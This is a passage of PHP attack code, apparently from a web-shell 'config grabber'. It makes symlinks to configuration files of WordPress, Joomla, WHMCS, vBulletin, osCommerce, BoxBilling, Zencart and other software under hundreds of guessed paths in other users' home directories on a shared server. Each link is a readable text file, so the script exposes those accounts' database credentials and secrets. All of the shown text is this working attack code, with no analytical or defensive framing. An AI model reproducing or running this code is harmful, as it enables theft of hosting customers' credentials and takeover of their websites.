  1607. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1610. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1613. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1614. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1615. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1617. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1618.  
  1619. //Home2
  1620.  
  1621. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1622. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1623. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1624. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1625. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1626. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1627. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1628. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1629. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1630. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1631. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1632. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1633. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1634. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1645. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1646. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1647. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1648. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1649. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1650. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1651. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1652. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1654. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1655. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1657. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1660. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1661. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1662. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1663. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1664. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1665. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1666. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1667. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1771. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1772. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1773. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1774. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1775. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1776. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1777. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1778. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1779. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1780. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1781. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1782. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1783. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1793. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1794. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1795. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1796. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1797. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1798. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1799. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1800. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1801.  
  1802. //Home3
  1803.  
  1804. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1805. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1806. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1807. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1808. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1809. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1810. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1811. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1812. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1813. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1814. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1815. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1816. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1817. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1828. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1829. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1830. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1831. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1832. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1833. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1834. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1835. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1837. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1838. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1840. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1843. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1844. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1845. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1846. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1847. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1848. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1849. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1850. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1902. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
